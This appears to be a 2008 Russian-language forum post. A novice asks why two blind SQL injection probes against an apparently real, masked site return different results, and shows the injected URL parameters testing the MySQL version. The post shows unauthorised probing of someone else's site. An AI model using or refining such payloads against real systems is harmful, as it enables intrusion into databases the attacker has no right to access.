19.06.2008, 19:50
|
|
Новичок
Регистрация: 26.04.2008
Сообщений: 23
Провел на форуме:
53043
Репутация:
0
|
|
помогите составить запрос !
есть бажнии саит ! слепая sql injection!
пример :
http://********/concurs.php?id=4+AND+substring(version(),1,1)=5
резулитат : TRUE
а если :
http://*******/concurs.php?id=4+AND+ascii(lower(substring(version (),1,1)))=5
резулитат : FALSE
почему ????
читал статию http://injection.rulezz.ru/mysql_char_brute.html но чёта не как там описано ! help! |
|
|